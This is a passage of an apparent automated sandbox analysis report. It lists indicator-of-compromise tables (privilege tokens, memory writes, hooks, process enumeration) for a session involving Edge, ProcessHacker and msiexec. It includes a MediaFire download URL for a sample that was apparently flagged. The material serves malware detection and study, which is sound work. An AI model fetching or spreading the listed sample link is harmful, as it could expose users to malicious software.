0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	ProcessHacker.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 495108.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2712	msedge.exe
2712	msedge.exe
3912	msedge.exe
3912	msedge.exe
3020	identity_helper.exe
3020	identity_helper.exe
4964	msedge.exe
4964	msedge.exe
6008	msedge.exe
6008	msedge.exe
4996	msedge.exe
4996	msedge.exe
2428	mspaint.exe
2428	mspaint.exe
1768	msedge.exe
1768	msedge.exe
6080	processhacker-2.39-setup.tmp
6080	processhacker-2.39-setup.tmp
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

pid	Process
2024	OpenWith.exe
5224	ProcessHacker.exe
5728	OpenWith.exe
4908	OpenWith.exe
2704	OpenWith.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
640	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 32 IoCs

pid	Process
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5224	ProcessHacker.exe
Token: SeIncBasePriorityPrivilege	5224	ProcessHacker.exe
Token: 33	5224	ProcessHacker.exe
Token: SeLoadDriverPrivilege	5224	ProcessHacker.exe
Token: SeProfSingleProcessPrivilege	5224	ProcessHacker.exe
Token: SeRestorePrivilege	5224	ProcessHacker.exe
Token: SeShutdownPrivilege	5224	ProcessHacker.exe
Token: SeTakeOwnershipPrivilege	5224	ProcessHacker.exe
Token: SeTcbPrivilege	2692	svchost.exe
Token: SeRestorePrivilege	2692	svchost.exe
Token: SeShutdownPrivilege	2784	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2784	msiexec.exe
Token: SeSecurityPrivilege	1220	msiexec.exe
Token: SeCreateTokenPrivilege	2784	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2784	msiexec.exe
Token: SeLockMemoryPrivilege	2784	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2784	msiexec.exe
Token: SeMachineAccountPrivilege	2784	msiexec.exe
Token: SeTcbPrivilege	2784	msiexec.exe
Token: SeSecurityPrivilege	2784	msiexec.exe
Token: SeTakeOwnershipPrivilege	2784	msiexec.exe
Token: SeLoadDriverPrivilege	2784	msiexec.exe
Token: SeSystemProfilePrivilege	2784	msiexec.exe
Token: SeSystemtimePrivilege	2784	msiexec.exe
Token: SeProfSingleProcessPrivilege	2784	msiexec.exe
Token: SeIncBasePriorityPrivilege	2784	msiexec.exe
Token: SeCreatePagefilePrivilege	2784	msiexec.exe
Token: SeCreatePermanentPrivilege	2784	msiexec.exe
Token: SeBackupPrivilege	2784	msiexec.exe
Token: SeRestorePrivilege	2784	msiexec.exe
Token: SeShutdownPrivilege	2784	msiexec.exe
Token: SeDebugPrivilege	2784	msiexec.exe
Token: SeAuditPrivilege	2784	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2784	msiexec.exe
Token: SeChangeNotifyPrivilege	2784	msiexec.exe
Token: SeRemoteShutdownPrivilege	2784	msiexec.exe
Token: SeUndockPrivilege	2784	msiexec.exe
Token: SeSyncAgentPrivilege	2784	msiexec.exe
Token: SeEnableDelegationPrivilege	2784	msiexec.exe
Token: SeManageVolumePrivilege	2784	msiexec.exe
Token: SeImpersonatePrivilege	2784	msiexec.exe
Token: SeCreateGlobalPrivilege	2784	msiexec.exe
Token: SeRestorePrivilege	1220	msiexec.exe
Token: SeTakeOwnershipPrivilege	1220	msiexec.exe
Token: SeRestorePrivilege	1220	msiexec.exe
Token: SeTakeOwnershipPrivilege	1220	msiexec.exe
Token: SeRestorePrivilege	1220	msiexec.exe
Token: SeTakeOwnershipPrivilege	1220	msiexec.exe
Token: SeRestorePrivilege	1220	msiexec.exe
Token: SeTakeOwnershipPrivilege	1220	msiexec.exe
Token: SeRestorePrivilege	1220	msiexec.exe
Token: SeTakeOwnershipPrivilege	1220	msiexec.exe
Token: SeRestorePrivilege	1220	msiexec.exe
Token: SeTakeOwnershipPrivilege	1220	msiexec.exe
Token: SeRestorePrivilege	1220	msiexec.exe
Token: SeTakeOwnershipPrivilege	1220	msiexec.exe
Token: SeRestorePrivilege	1220	msiexec.exe
Token: SeTakeOwnershipPrivilege	1220	msiexec.exe
Token: SeRestorePrivilege	1220	msiexec.exe
Token: SeTakeOwnershipPrivilege	1220	msiexec.exe
Token: SeRestorePrivilege	1220	msiexec.exe
Token: SeTakeOwnershipPrivilege	1220	msiexec.exe
Token: SeRestorePrivilege	1220	msiexec.exe
Token: SeTakeOwnershipPrivilege	1220	msiexec.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
2428	mspaint.exe
2024	OpenWith.exe
3436	mspaint.exe
5728	OpenWith.exe
5908	mspaint.exe
2308	OpenWith.exe
4432	mspaint.exe
2804	OpenWith.exe
3036	mspaint.exe
4908	OpenWith.exe
4324	mspaint.exe
2704	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3912 wrote to memory of 3220	3912	msedge.exe	82
PID 3912 wrote to memory of 3220	3912	msedge.exe	82
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 3696	3912	msedge.exe	83
PID 3912 wrote to memory of 2712	3912	msedge.exe	84
PID 3912 wrote to memory of 2712	3912	msedge.exe	84
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85
PID 3912 wrote to memory of 2536	3912	msedge.exe	85

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/t7luh6kz7nvww4b/x64__installer_x32__.zip/file
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93d6e46f8,0x7ff93d6e4708,0x7ff93d6e4718
  2⤵
  PID:3220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
  2⤵
  PID:3696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8
  2⤵
  PID:2536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:4860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
  2⤵
  PID:3268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:1
  2⤵
  PID:3228
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5976 /prefetch:8
  2⤵
  PID:1064
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5976 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1
  2⤵
  PID:5156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2104 /prefetch:1
  2⤵
  PID:5372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:1
  2⤵
  PID:5452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6560 /prefetch:1
  2⤵
  PID:5564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:1
  2⤵
  PID:5692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2128 /prefetch:1
  2⤵
  PID:5876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
  2⤵
  PID:5884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6584 /prefetch:8
  2⤵
  PID:6024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6564 /prefetch:1
  2⤵
  PID:6032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
  2⤵
  PID:3864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
  2⤵
  PID:1960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6804 /prefetch:1
  2⤵
  PID:5756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2912 /prefetch:1
  2⤵
  PID:5840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6860 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5452 /prefetch:8
  2⤵
  PID:5980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3260 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:6008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1
  2⤵
  PID:3536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3480 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
  2⤵
  PID:5912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
  2⤵
  PID:6060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
  2⤵
  PID:5700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
